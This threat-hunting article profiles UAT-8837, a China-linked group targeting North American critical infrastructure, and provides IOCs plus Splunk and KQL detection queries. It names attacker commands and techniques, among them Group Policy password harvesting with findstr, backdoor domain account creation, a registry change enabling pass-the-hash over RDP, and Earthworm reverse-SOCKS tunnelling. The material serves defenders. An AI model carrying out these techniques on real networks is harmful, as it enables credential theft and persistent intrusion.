Article Banner

UAT-8837: China-Nexus APT Targeting North American Critical Infrastructure

Published on March 14, 2026 | By Focused Hunts

A China-linked threat group tracked as UAT-8837 is actively targeting critical infrastructure organizations across North America. The group focuses on telecommunications, energy, water, and transportation sectors. UAT-8837 exploits vulnerabilities in public-facing web applications to gain initial access, then conducts extensive reconnaissance of internal networks and directory environments to identify high-value targets.

Think of UAT-8837 as a locksmith who breaks into a building's lobby, then methodically copies every master key, maps every hallway, and installs hidden back doors before anyone notices the first lock was picked. The group uses stolen credentials and remote access tools to spread across networks while disguising its attack tools as harmless icon files to avoid detection.

Compromised organizations face credential theft across their entire domain, unauthorized access to sensitive systems, and the creation of hidden backdoor accounts that persist long after the initial breach is discovered. The group also steals proprietary software libraries from compromised environments, raising the risk of future supply chain attacks affecting downstream customers and partners.

Hunting Controls & Observations

Organizations can detect UAT-8837 activity through multiple telemetry sources:

  • Endpoint Controls: EDR/XDR platforms, Sysmon (Events 1, 3, 11, 12/13), PowerShell logging (Event IDs 4103, 4104), file integrity monitoring for staging directories, registry modification alerts
  • Network Controls: Firewall logs monitoring outbound SOCKS proxy connections, IDS/IPS (Snort SIDs 61883, 61884, 63727, 63728), NetFlow analysis for multi-port C2 tunneling patterns
  • Identity & Access Controls: Windows Event IDs 4624 (logon), 4720 (account creation), 4732 (group membership), Kerberos ticket request anomalies, Active Directory object access auditing
  • Application Controls: SiteCore application logs for ViewState deserialization exploitation attempts (CVE-2025-53690), WMI execution logs, Remote Desktop connection auditing

Behavioral Indicators of Attack

  • DisableRestrictedAdmin Registry Modification (Endpoint): UAT-8837 modifies the registry key HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin to enable pass-the-hash attacks over RDP. This change removes RDP restricted admin protections and enables lateral movement with stolen NTLM hashes.
  • Executable Masquerading with .ico Extensions (Endpoint): The threat actor renames attack tools (Earthworm, GoExec, Rubeus, SharpWMI) with .ico file extensions and stages them in C:\Windows\Temp\ and C:\Users\public\ directories. PE executables with icon file extensions indicate deliberate evasion of file-type-based detection.
  • Rapid Active Directory Enumeration via Native Tools (Endpoint/Identity): Sequential execution of dsquery, dsget, setspn, net group, and nltest commands within short time windows indicates systematic directory reconnaissance. UAT-8837 uses these living-off-the-land binaries to map domain structure, enumerate service accounts, and identify domain controllers.
  • Earthworm Reverse SOCKS Proxy Tunneling (Network): The threat actor deploys multiple instances of Earthworm with the -s rssocks flag across non-standard ports (443, 447, 1433, 8888, 11112). Multiple simultaneous tunnel connections to the same external IP on different ports indicate redundant C2 channel establishment.
  • GoExec WMI-Based Remote Command Execution (Endpoint/Network): UAT-8837 uses GoExec with WMI and DCOM execution methods, passing NTLM hashes directly for authentication. Command patterns include wmi proc and dcom mmc with internal IP targets and hash-based authentication.
  • Group Policy Preferences Password Harvesting (Identity): Execution of findstr /S /l cpassword targeting Group Policy XML files indicates credential harvesting from legacy Group Policy Preferences. This technique extracts stored passwords from domain-accessible policy files.
  • Iterative Tool Cycling Under Detection Pressure (Endpoint): UAT-8837 deploys multiple variants of the same tool category (Impacket, then Invoke-WMIExec, then GoExec) when security products detect earlier versions. Rapid sequential deployment of functionally similar tools from staging directories signals active evasion of endpoint detection.
  • Backdoor Domain Account Creation (Identity): The threat actor creates new domain accounts using net user /add /domain and adds them to privileged local groups. Account creation outside normal provisioning workflows, particularly during off-hours, signals unauthorized persistence establishment.

MITRE Enterprise ATT&CK Tactics and Techniques

UAT-8837's methodology aligns with MITRE ATT&CK Enterprise tactics across the kill chain:

  • Initial Access (T1190 - Exploit Public-Facing Application): UAT-8837 exploits CVE-2025-53690, a ViewState deserialization vulnerability in SiteCore, to achieve remote code execution on publicly accessible web servers. The group targets internet-facing applications as the primary entry point into critical infrastructure networks.
  • Defense Evasion (T1036 - Masquerading): The threat actor renames executable tools with .ico extensions to evade file-type-based detection. Tools like Earthworm, GoExec, and Rubeus are deployed as v.ico, goe.ico, and r.ico in staging directories.
  • Defense Evasion (T1556 - Modify Authentication Process): UAT-8837 modifies the DisableRestrictedAdmin registry value to remove RDP restricted admin protections. This enables pass-the-hash attacks over Remote Desktop Protocol without requiring plaintext credentials.
  • Discovery (T1087.002 - Account Discovery: Domain Account): The threat actor conducts extensive Active Directory reconnaissance using native Windows tools including dsquery, dsget, net group, and net user. These commands enumerate domain administrators, service accounts, and organizational unit structures.
  • Discovery (T1482 - Domain Trust Discovery): UAT-8837 uses nltest /DCLIST and nslookup to enumerate domain controllers and map trust relationships. This reconnaissance enables the group to identify additional targets across trusted domains.
  • Credential Access (T1558 - Steal or Forge Kerberos Tickets): The group deploys Rubeus for Kerberos ticket manipulation, enabling Kerberoasting and ticket forgery attacks. Combined with setspn enumeration, this technique extracts service account credentials from Active Directory.
  • Lateral Movement (T1550.002 - Use Alternate Authentication Material: Pass the Ticket): UAT-8837 leverages stolen Kerberos tickets and NTLM hashes to authenticate across the network without plaintext passwords. GoExec executes commands on remote systems using pass-the-hash authentication via WMI and DCOM.
  • Lateral Movement (T1021.001 - Remote Services: Remote Desktop Protocol): After disabling restricted admin protections, the threat actor uses RDP with stolen credentials for interactive access to compromised systems. This provides hands-on-keyboard control for deeper reconnaissance and data collection.
  • Command and Control (T1090 - Proxy): UAT-8837 establishes reverse SOCKS proxy tunnels using Earthworm to route traffic through compromised systems to attacker infrastructure. Multiple simultaneous tunnels on ports 443, 447, 1433, and 8888 provide redundant command and control channels.
  • Exfiltration (T1048 - Exfiltration Over Alternative Protocol): The threat actor exfiltrates stolen credentials, security configurations, and proprietary DLLs through Earthworm SOCKS proxy tunnels across multiple ports. Using SQL Server port 1433 and other non-standard ports for tunneling disguises exfiltration as legitimate traffic.

Controls' Observables

Endpoint Controls

Endpoint detection and response platforms can identify UAT-8837 through multiple behavioral signatures:

  • Registry Modification for RDP Bypass: Monitor for changes to HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin. Any modification to this value outside authorized hardening workflows indicates potential pass-the-hash preparation. (Related MITRE Techniques: T1556, T1021.001 | Detection Difficulty: LOW)
  • PE Executables with Non-Executable Extensions: Alert on process execution from files with .ico, .jpg, or other non-executable extensions, particularly in C:\Windows\Temp\ and C:\Users\public\ directories. (Related MITRE Techniques: T1036, T1036.004 | Detection Difficulty: LOW)
  • Rapid Native Tool Execution Sequences: Detect sequential execution of dsquery, dsget, setspn, net group, and nltest within short time windows (under 10 minutes). Legitimate administration rarely triggers this volume of AD queries in rapid succession. (Related MITRE Techniques: T1087.002, T1482 | Detection Difficulty: MEDIUM)
  • GoExec Command-Line Patterns: Monitor for process execution with command-line arguments containing wmi proc or dcom mmc combined with IP addresses and the -H flag (hash-based authentication). (Related MITRE Techniques: T1550.002, T1021.006 | Detection Difficulty: LOW)
  • Security Policy Export Activity: Alert on execution of secedit /export commands that dump Windows security policies to temporary files, indicating security configuration reconnaissance. (Related MITRE Techniques: T1201 | Detection Difficulty: LOW)

Network Controls

Network monitoring systems can detect UAT-8837's tunneling and command-and-control activities:

  • Multi-Port Outbound Connections to Single IP: Alert on connections from internal hosts to the same external IP across multiple ports (443, 447, 1433, 8888, 11112). UAT-8837 establishes redundant Earthworm tunnels for persistent C2 access. (Related MITRE Techniques: T1090, T1571 | Detection Difficulty: LOW)
  • SOCKS Proxy Traffic Patterns: Detect outbound traffic patterns consistent with SOCKS proxy handshakes, particularly on non-standard ports like 447, 1433, and 8888. (Related MITRE Techniques: T1090.001 | Detection Difficulty: MEDIUM)
  • WMI Remote Execution Network Traffic: Monitor for WMI/DCOM network traffic between internal systems that do not normally communicate, particularly when combined with NTLM authentication. (Related MITRE Techniques: T1021.006, T1550.003 | Detection Difficulty: MEDIUM)

Identity & Access Controls

Identity and authentication monitoring can detect UAT-8837's credential abuse and persistence establishment:

  • Unauthorized Domain Account Creation: Alert on net user /add /domain execution and Windows Event ID 4720 (user account creation) outside normal provisioning workflows. UAT-8837 creates backdoor accounts for persistent access. (Related MITRE Techniques: T1136.002 | Detection Difficulty: LOW)
  • Kerberos Ticket Anomalies: Monitor for unusual Kerberos ticket requests, particularly Kerberoasting patterns (TGS requests for service accounts with weak encryption) and ticket forgery indicators from Rubeus. (Related MITRE Techniques: T1558, T1558.003 | Detection Difficulty: MEDIUM)
  • Group Policy Preferences Password Access: Detect execution of findstr targeting cpassword in Group Policy XML files. This indicates harvesting of legacy stored credentials from domain-accessible policy files. (Related MITRE Techniques: T1555 | Detection Difficulty: LOW)
  • Pass-the-Hash Authentication Patterns: Alert on NTLM authentication events (Event ID 4624, Logon Type 3) from unexpected sources combined with RDP sessions (Logon Type 10) to systems where DisableRestrictedAdmin was recently modified. (Related MITRE Techniques: T1550.002, T1550.003 | Detection Difficulty: MEDIUM)

Insights and Recommendation

Organizations compromised by UAT-8837 face domain-wide credential theft, unauthorized persistent access through backdoor accounts, and complete Active Directory compromise enabling lateral movement to any connected system. The group's exfiltration of proprietary software libraries introduces supply chain risk that extends beyond the immediate victim to customers and partners who rely on those products. Recovery requires full credential rotation across the domain, forensic investigation of all systems contacted by Earthworm tunnels, and remediation of the initial web application vulnerability.

Security teams should prioritize monitoring for DisableRestrictedAdmin registry modifications (T1556) and executable files with .ico extensions in staging directories (T1036), as these represent early-stage indicators before lateral movement begins. Detection engineering efforts should focus on behavioral patterns: rapid Active Directory enumeration sequences using native tools (T1087.002), multi-port outbound connections to single external IPs (T1090), and WMI-based remote execution with hash-based authentication (T1550.002). Organizations running SiteCore should prioritize patching CVE-2025-53690, restrict outbound connectivity from web servers, and implement network segmentation to limit lateral movement from DMZ systems into internal Active Directory environments.

Source and Credits

This summary is based on Cisco Talos Intelligence's research article "UAT-8837 targets critical infrastructure sectors in North America" published on January 15, 2026. Additional IOCs are available at the Cisco Talos IOC repository.

Threat Hunting IOCs & Queries

Known Indicators of Compromise

  • File Hashes (SHA-256):
    • GoTokenTheft: 1b3856e5d8c6a4cec1c09a68e0f87a5319c1bd4c8726586fd3ea1b3434e22dfa
    • GoTokenTheft: 891246a7f6f7ba345f419404894323045e5725a2252c000d45603d6ddf697795
    • Earthworm: 451e03c6a783f90ec72e6eab744ebd11f2bdc66550d9a6e72c0ac48439d774cd
    • Earthworm: B3f83721f24f7ee5eb19f24747b7668ff96da7dfd9be947e6e24a688ecc0a52b
    • Earthworm: Fab292c72ad41bae2f02ae5700c5a88b40a77f0a3d9cbdf639f52bc4f92bb0a6
    • Earthworm: 4f7518b2ee11162703245af6be38f5db50f92e65c303845ef13b12c0f1fc2883
    • GoExec: 887817fbaf137955897d62302c5d6a46d6b36cb34775e4693e30e32609fb6744
    • GoExec: 4af156b3285b49485ef445393c26ca1bb5bfe7cdc59962c5c5725e3f3c574f7c
    • SharpHound: 5090f311b37309767fb41fa9839d2770ab382326f38bab8c976b83ec727e6796
    • Impacket: 6e8af5c507b605a16373e8453782bfd8a3ec3bd76f891e71a159d8c2ff2a5bb0
    • SharpWMI: 1de72bb4f116e969faff90c1e915e70620b900e3117788119cffc644956a9183
    • Rubeus: 51d6448e886521aaaaf929a50763156ceb99ede587c65de971700a5583d6a487
    • Rubeus: 2f295f0cedc37b0e1ea22de9d8cb461fa6f84ab0673fde995fd0468a485ddb59
    • Certipy: E27e6e8e97421593f1e8d66f280e894525e22b373248709beaf81dc6107fb88d
  • C2 IP Addresses:
    • 74.176.166.174
    • 20.200.129.75
    • 172.188.162.183
    • 4.144.1.47
    • 103.235.46.102
  • File Paths:
    • C:\Windows\Temp\v.ico, eir.ico, cisos.ico, vgent.ico (Earthworm variants)
    • C:\Windows\Temp\goe.exe, goe.ico (GoExec)
    • C:\Windows\Temp\r.ico (Rubeus)
    • C:\Windows\Temp\s.ico (SharpWMI)
    • C:\Windows\Temp\wec.ico (Impacket)
    • C:\Windows\Temp\SharpHound.exe, Certipy.exe
    • C:\Users\public\music\aa.exe, twd.exe (Earthworm)
  • Registry Keys:
    • HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin (set to 0x00000000)

Query 1: DisableRestrictedAdmin Registry Modification

Behavior Targeted: Detects modification of the DisableRestrictedAdmin registry value, a technique UAT-8837 uses to enable pass-the-hash attacks over RDP. This registry change removes restricted admin protections, allowing lateral movement with stolen NTLM hashes without plaintext credentials.
MITRE ATT&CK: T1556, T1021.001
Expected Results: Events showing registry modifications to the DisableRestrictedAdmin value, particularly from command-line REG ADD operations or non-standard processes. True positives show this modification followed by RDP connections from unexpected sources.
False Positive Likelihood: LOW - This registry modification is uncommon in most environments. Legitimate changes occur only during specific RDP hardening configurations and are typically managed through Group Policy.
Tuning Guidance: Investigate any modification to this registry value outside of authorized change windows. Correlate with subsequent RDP logon events (Event ID 4624, Logon Type 10) to identify lateral movement following the registry change.

Splunk SPL Query

index=windows sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=13
    earliest=-7d
    TargetObject="HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin"
| eval Details=coalesce(Details, "unknown")
| stats count, values(Details) as RegistryValues,
        earliest(_time) as FirstSeen, latest(_time) as LastSeen
    by ComputerName, User, Image, TargetObject
| eval FirstSeen=strftime(FirstSeen, "%Y-%m-%d %H:%M:%S"),
       LastSeen=strftime(LastSeen, "%Y-%m-%d %H:%M:%S")
| table FirstSeen, LastSeen, ComputerName, User, Image, TargetObject, RegistryValues, count
| sort - FirstSeen

// TUNING: This registry modification is rarely legitimate - investigate all results
// TUNING: Correlate with Event ID 4624 Logon Type 10 (RDP) within 1 hour of modification
// FALSE POSITIVES: GPO-managed RDP hardening, authorized IT admin configuration changes

Microsoft KQL Query (Defender/Sentinel)

DeviceRegistryEvents
| where Timestamp > ago(7d)
| where RegistryKey has "CurrentControlSet\\Control\\Lsa"
| where RegistryValueName =~ "DisableRestrictedAdmin"
| extend ModifiedBy = InitiatingProcessFileName
| extend ModifiedByPath = InitiatingProcessFolderPath
| extend CommandUsed = InitiatingProcessCommandLine
| project Timestamp, DeviceName, ModifiedBy, ModifiedByPath, CommandUsed,
          RegistryKey, RegistryValueName, RegistryValueData, ActionType
| order by Timestamp desc

// TUNING: Investigate all results - this modification is rarely legitimate
// TUNING: Join with DeviceLogonEvents (LogonType == "RemoteInteractive") within 1 hour
// FALSE POSITIVES: Group Policy-managed RDP configuration, authorized hardening scripts

Note: These queries were generated with AI assistance. Test thoroughly in your environment before production use.

Query 2: Executable Files Masquerading with .ico Extensions

Behavior Targeted: Detects execution of PE executable files renamed with .ico extensions, a masquerading technique UAT-8837 uses to evade file-type-based security controls. The threat actor stages tools like Earthworm, GoExec, and Rubeus as .ico files in Windows Temp and Public directories.
MITRE ATT&CK: T1036, T1036.004
Expected Results: Process creation events where the executable file has an .ico extension but exhibits PE executable behavior. True positives show .ico files executing with command-line arguments consistent with attack tooling (e.g., -s rssocks, wmi proc).
False Positive Likelihood: LOW - Legitimate .ico files are image resources and do not execute as processes. Any process creation from a .ico file is suspicious.
Tuning Guidance: Expand detection to include other non-executable extensions (.jpg, .png, .bmp, .gif) used for masquerading. Focus on staging directories: C:\Windows\Temp\, C:\Users\public\, and user Desktop folders.

Splunk SPL Query

index=windows sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
    earliest=-7d
    (Image="*.ico" OR Image="*.ico\"")
| rex field=Image "(?<file_ext>\.\w+)$"
| where file_ext=".ico"
| stats count, values(CommandLine) as Commands,
        earliest(_time) as FirstSeen, latest(_time) as LastSeen
    by ComputerName, User, Image, ParentImage
| eval FirstSeen=strftime(FirstSeen, "%Y-%m-%d %H:%M:%S"),
       LastSeen=strftime(LastSeen, "%Y-%m-%d %H:%M:%S")
| table FirstSeen, LastSeen, ComputerName, User, Image, ParentImage, Commands, count
| sort - FirstSeen

// TUNING: Expand to other non-executable extensions: .jpg, .png, .bmp, .gif, .txt
// TUNING: Prioritize results from staging directories (C:\Windows\Temp\, C:\Users\public\)
// FALSE POSITIVES: Extremely rare - legitimate .ico files do not execute as processes

Microsoft KQL Query (Defender/Sentinel)

DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName endswith ".ico"
| extend ParentProcess = InitiatingProcessFileName
| extend FullPath = FolderPath
| extend CmdLine = ProcessCommandLine
| project Timestamp, DeviceName, AccountName, FileName, FullPath,
          ParentProcess, CmdLine, ProcessId
| order by Timestamp desc

// TUNING: Expand detection to other non-executable extensions (.jpg, .png, .bmp)
// TUNING: Correlate with DeviceFileEvents to identify when .ico files were created/dropped
// FALSE POSITIVES: Extremely rare - .ico files should not spawn processes

Note: These queries were generated with AI assistance. Test thoroughly in your environment before production use.

Query 3: Rapid Active Directory Enumeration via Native Tools

Behavior Targeted: Detects rapid sequential execution of native Active Directory enumeration commands (dsquery, dsget, setspn, net group, nltest, net user) within short time windows. UAT-8837 conducts extensive AD reconnaissance using these living-off-the-land binaries to map domain structure, enumerate privileged accounts, and discover service principals for Kerberoasting.
MITRE ATT&CK: T1087.002, T1482, T1201
Expected Results: Events showing a single user or system executing 5 or more distinct AD enumeration commands within 10 minutes. True positives show commands targeting domain admin groups, service accounts, domain controllers, and security policies in rapid succession.
False Positive Likelihood: MEDIUM - System administrators and identity management tools occasionally execute AD queries. Scheduled scripts for AD health monitoring can trigger this detection. The combination of multiple query types within a short window distinguishes malicious reconnaissance from routine administration.
Tuning Guidance: Adjust the unique command threshold (currently 5) and time window based on administrative patterns in your environment. Allowlist known AD management tools and service accounts. Prioritize results from non-admin users or interactive sessions on servers.

Splunk SPL Query

index=windows sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
    earliest=-24h
    (Image="*\\dsquery.exe" OR Image="*\\dsget.exe" OR Image="*\\setspn.exe"
     OR Image="*\\nltest.exe" OR Image="*\\net.exe" OR Image="*\\net1.exe")
| eval ad_command=case(
    match(Image, "dsquery"), "dsquery",
    match(Image, "dsget"), "dsget",
    match(Image, "setspn"), "setspn",
    match(Image, "nltest"), "nltest",
    match(CommandLine, "net\s+(group|user|localgroup|accounts)"), "net_ad",
    1=1, "other")
| where ad_command!="other"
| bin _time span=10m
| stats dc(ad_command) as UniqueCommands,
        values(ad_command) as CommandTypes,
        values(CommandLine) as FullCommands,
        count,
        earliest(_time) as FirstSeen, latest(_time) as LastSeen
    by ComputerName, User, _time
| where UniqueCommands >= 4
| eval FirstSeen=strftime(FirstSeen, "%Y-%m-%d %H:%M:%S"),
       LastSeen=strftime(LastSeen, "%Y-%m-%d %H:%M:%S")
| table FirstSeen, LastSeen, ComputerName, User, UniqueCommands, CommandTypes, count, FullCommands
| sort - UniqueCommands

// TUNING: Adjust UniqueCommands threshold (currently >=4) based on admin behavior baseline
// TUNING: Reduce bin span (currently 10m) for stricter detection of rapid enumeration bursts
// FALSE POSITIVES: AD health monitoring scripts, identity management tools, IT admin troubleshooting

Microsoft KQL Query (Defender/Sentinel)

DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName in~ ("dsquery.exe", "dsget.exe", "setspn.exe", "nltest.exe", "net.exe", "net1.exe")
| where ProcessCommandLine has_any ("group", "user", "localgroup", "accounts",
                                     "DCLIST", "domain", "-L", "-Q", "dsquery", "dsget")
| extend ADCommand = case(
    FileName =~ "dsquery.exe", "dsquery",
    FileName =~ "dsget.exe", "dsget",
    FileName =~ "setspn.exe", "setspn",
    FileName =~ "nltest.exe", "nltest",
    FileName in~ ("net.exe", "net1.exe"), "net_ad",
    "other")
| summarize UniqueCommands = dcount(ADCommand),
            CommandTypes = make_set(ADCommand),
            FullCommands = make_set(ProcessCommandLine, 20),
            Count = count(),
            FirstSeen = min(Timestamp),
            LastSeen = max(Timestamp)
    by DeviceName, AccountName, bin(Timestamp, 10m)
| where UniqueCommands >= 4
| extend TimeSpanSeconds = datetime_diff('second', LastSeen, FirstSeen)
| project FirstSeen, LastSeen, DeviceName, AccountName, UniqueCommands,
          CommandTypes, Count, TimeSpanSeconds, FullCommands
| order by UniqueCommands desc

// TUNING: Adjust UniqueCommands (>=4) and bin window (10m) based on admin patterns
// TUNING: Allowlist known AD management service accounts and monitoring tools
// FALSE POSITIVES: Identity management platforms, scheduled AD health checks, admin troubleshooting

Note: These queries were generated with AI assistance. Test thoroughly in your environment before production use.

Query 4: Earthworm Reverse SOCKS Proxy Tunneling

Behavior Targeted: Detects command-line patterns consistent with Earthworm reverse SOCKS proxy deployment, UAT-8837's primary tunneling tool. The threat actor deploys Earthworm with the -s rssocks flag to establish reverse SOCKS tunnels to attacker-controlled infrastructure across multiple ports (443, 447, 1433, 8888, 11112) for persistent command and control.
MITRE ATT&CK: T1090, T1090.001, T1048
Expected Results: Process execution events with command-line arguments containing Earthworm signatures (-s rssocks, -s ssocksd, -s lcx_tran) combined with external IP addresses and port specifications. True positives show .ico or .exe files from staging directories executing with these arguments.
False Positive Likelihood: LOW - The rssocks command-line pattern is specific to Earthworm and similar tunneling tools. Legitimate network utilities do not use this syntax.
Tuning Guidance: Expand detection to include Earthworm port forwarding patterns (-p and -f flags) used for internal tunnel chaining. Monitor for multiple processes on the same host connecting to the same external IP on different ports, indicating redundant tunnel establishment.

Splunk SPL Query

index=windows sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
    earliest=-7d
    (CommandLine="*rssocks*" OR CommandLine="*ssocksd*" OR CommandLine="*lcx_tran*"
     OR CommandLine="*lcx_slave*" OR CommandLine="*lcx_listen*")
| eval tunnel_type=case(
    match(CommandLine, "rssocks"), "Reverse SOCKS Proxy",
    match(CommandLine, "ssocksd"), "SOCKS Server",
    match(CommandLine, "lcx_tran"), "Port Forward",
    match(CommandLine, "lcx_slave"), "Slave Tunnel",
    match(CommandLine, "lcx_listen"), "Listen Tunnel",
    1=1, "Unknown")
| rex field=CommandLine "-d\s+(?<c2_ip>[\d\.]+)"
| rex field=CommandLine "-e\s+(?<c2_port>\d+)"
| stats count, values(tunnel_type) as TunnelTypes,
        values(c2_ip) as C2IPs, values(c2_port) as C2Ports,
        earliest(_time) as FirstSeen, latest(_time) as LastSeen
    by ComputerName, User, Image
| eval FirstSeen=strftime(FirstSeen, "%Y-%m-%d %H:%M:%S"),
       LastSeen=strftime(LastSeen, "%Y-%m-%d %H:%M:%S")
| table FirstSeen, LastSeen, ComputerName, User, Image, TunnelTypes, C2IPs, C2Ports, count
| sort - FirstSeen

// TUNING: Any match is high-confidence - rssocks syntax is specific to Earthworm tunneling
// TUNING: Cross-reference C2 IPs with known UAT-8837 infrastructure
// FALSE POSITIVES: Extremely rare - this command syntax is unique to Earthworm and similar tools

Microsoft KQL Query (Defender/Sentinel)

DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has_any ("rssocks", "ssocksd", "lcx_tran", "lcx_slave", "lcx_listen")
| extend TunnelType = case(
    ProcessCommandLine has "rssocks", "Reverse SOCKS Proxy",
    ProcessCommandLine has "ssocksd", "SOCKS Server",
    ProcessCommandLine has "lcx_tran", "Port Forward",
    ProcessCommandLine has "lcx_slave", "Slave Tunnel",
    ProcessCommandLine has "lcx_listen", "Listen Tunnel",
    "Unknown")
| extend C2IP = extract(@"-d\s+([\d\.]+)", 1, ProcessCommandLine)
| extend C2Port = extract(@"-e\s+(\d+)", 1, ProcessCommandLine)
| project Timestamp, DeviceName, AccountName, FileName, FolderPath,
          ProcessCommandLine, TunnelType, C2IP, C2Port
| order by Timestamp desc

// TUNING: Any match is high-confidence - this syntax is specific to Earthworm
// TUNING: Cross-reference C2IP values with known threat actor infrastructure
// FALSE POSITIVES: Extremely rare - legitimate tools do not use rssocks/lcx syntax

Note: These queries were generated with AI assistance. Test thoroughly in your environment before production use.

Back to Hunting off the Red